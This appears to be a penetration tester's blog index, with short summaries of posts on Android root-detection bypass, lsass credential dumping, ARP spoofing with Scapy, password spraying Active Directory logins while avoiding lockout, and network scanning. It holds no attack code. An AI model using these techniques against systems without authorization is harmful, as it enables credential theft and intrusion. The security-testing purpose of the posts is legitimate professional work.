I was working for a very large corporation that has many subsidiaries and they were buying up smaller companies. We needed to send out a dropbox (Raspberry Pi or Intel NUC) that we could have a remote office plug into the network for internal pentesting and it establishes a ssh tunnel to our server regardless of network restrictions in the remote office.

Android Testing Cheatsheet - Configuring tools and mobile device for Android app testing and find vulnerabilities. Updated on 4/20/2020

How to use the Objection framework with Frida to reverse engineer an Android app to bypass root detection.

This is my listing of iOS and Android assessment tools for my personal bookmarks.

Ruby-Nessus is a ruby interface for the popular Nessus vulnerability scanner. Ruby-Nessus aims to deliver an easy yet powerful interface for interacting and manipulating Nessus scan results and configurations. Ruby-Nessus currently supports both version 1.0 and 2.0 of the .nessus file format.

Update: CrackMapExec now includes the ‘lsassy’ module which automates the following steps. While the article below still works, if you need dump lsass across multiple hosts, I’d use CrackMapExec as the steps below take a lot more time.

While testing web applications, I monitor the application using Wireshark to see if the app is using a protocol that lacks support in Burp Suite, like HTTP2. This post shows how to decrypt TLS traffic in Wireshark on Kali Linux.

One of the prerequisites for using jackit with a CrazyRadio PA USB dongle is first flashing it using mousejack. This has always been problematic when using VMware. I was getting the error “The connection for the USB device ‘Nordic ASA nRF24LU1P-F32 BOOT LDR’ was unsuccessful.” which looked like a VMware dialog, not a dialog generated by the virtual machine (Kali Linux).

Update: This post is outdated. The Kali repo’s are fixed and now the best way to install PowerShell on Kali is to run this command: apt update && apt -y install powershell

Sure there are already some pretty good security tools that can pull off ARP spoofing: Ettercap, Bettercap, etc. This post details what I learned when I wanted to do it myself using Scapy, in the hopes that I can help someone else who’s also trying to learn how to use Scapy. After a while you get tired of using other people’s tools and want to learn how to do it yourself, even if you’re just creating yet another tool to do ‘X’, at least you’re learning something new.

Sometimes you may want to manually establish TCP 3-way handshakes when you’re using Python Scapy, but wouldn’t it be nice to use sockets to maintain the TCP handshake and pass the data to/from Scapy? If you don’t really care about the TCP handshake and want that taken care of while you fuzz the data, here’s an easy way using a StreamSocket with Scapy:

I frequently use the Intruder tab in Burp Suite Pro to password spray websites which use Active Directory authentication. One of the problems of using Burp Suite is that there doesn’t seem to be a way to avoid lockout when using a long password list. Frequently I don’t get a hit on valid password on the first try with Season/Year stuff like “Winter2018!” and need to run through a list of 51 common AD passwords that I have in a file. Sure, I can paste in a list of three or four passwords (depending on my client’s lockout policy), but then I have to wait X minutes and then replace those passwords with three of four more, track the time between password spray runs, etc. That’s a manual process, and I’d prefer something that I can setup and just let it run to completion.

ScanCannon - Runs Masscan, followed up by Nmap for service version info. This should finish scans much faster than Nmap alone while providing service version info that Masscan doesn’t provide.

The one thing that changed my life was when I read about interest vs commitment. Too often I hear people wish that things were different, or they want things they will never have or accomplish because they don’t know what it means to be committed to something, so they wander through life like a leaf on a stream never knowing they are holding themselves back and maybe they blame others or circumstance.

I tired of maintaining my own Wordpress blog, and issues with Wordpress on Digital Ocean resulted in my database going down repeatedly. Now I’m hosting on github.io and don’t have to worry about site security, databases, etc., just write and publish!